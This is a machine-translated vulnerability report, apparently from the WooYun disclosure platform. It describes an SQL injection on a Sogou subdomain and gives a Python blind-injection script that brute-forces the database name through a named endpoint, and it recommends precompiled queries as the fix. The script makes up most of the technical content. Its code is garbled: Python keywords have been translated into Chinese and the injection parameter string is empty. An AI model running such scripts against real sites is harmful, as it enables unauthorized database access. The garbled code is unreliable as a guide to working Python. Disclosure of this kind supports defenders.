漏洞标题 搜狗某站存在SQL注入(附验证脚本) 相关厂商 搜狗 漏洞作者 Vinc 提交时间 2016-04-23 09:26 公开时间 2016-06-11 18:50 漏洞类型 SQL注射漏洞 危…
漏洞标题
某个搜狗站有SQL注入(带验证脚本)
相关制造商
搜狗
漏洞作者
时Vinc
提交时间
2016-04-23 09: 26
公共时间
2016-06-11 18: 50
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
Sql注入
漏洞详细信息
网站:t.cp.sogou.com
什么时候:

对于Flase:

Database()长度为10

漏洞证明:
# - * - 编码: utf8 - * -
#编码=UTF-8
导入httplib
进口时间
导入字符串
导入系统
导入urllib
导入urllib2
headers={
'User-Agent':'Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/28.0.1500.63 Safari/537.36',
'Content-Type':'application/x-www-form-urlencoded'
}
Payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 @ _。')
打印'[%s]开始重试MySQL数据库()'%time.strftime('%H:%M:%S',time.localtime())
数据库=''
对于范围(1,11,1):中的i
对于有效负载:中的有效负载
试试:
Params=urllib.urlencode(''''''''''''
Conn=httplib.HTTPConnection('t.cp.sogou.com',timeout=20)
Conn.request(method='POST',url='/yllt/ylltTool11x5/ltTool11x5/dataFile.php',body=params,headers=headers)
Status=conn.getresponse()。status
如果status==500:
数据库+=有效负载
打印'\ r [正在扫描]',数据库
Time.sleep(0.01)
打破
Conn.close()
除了例外,e:
打印e
打印''
打印'database()is',数据库
修理计划:
预编译处理
版权声明:请注明出处Vinc @乌云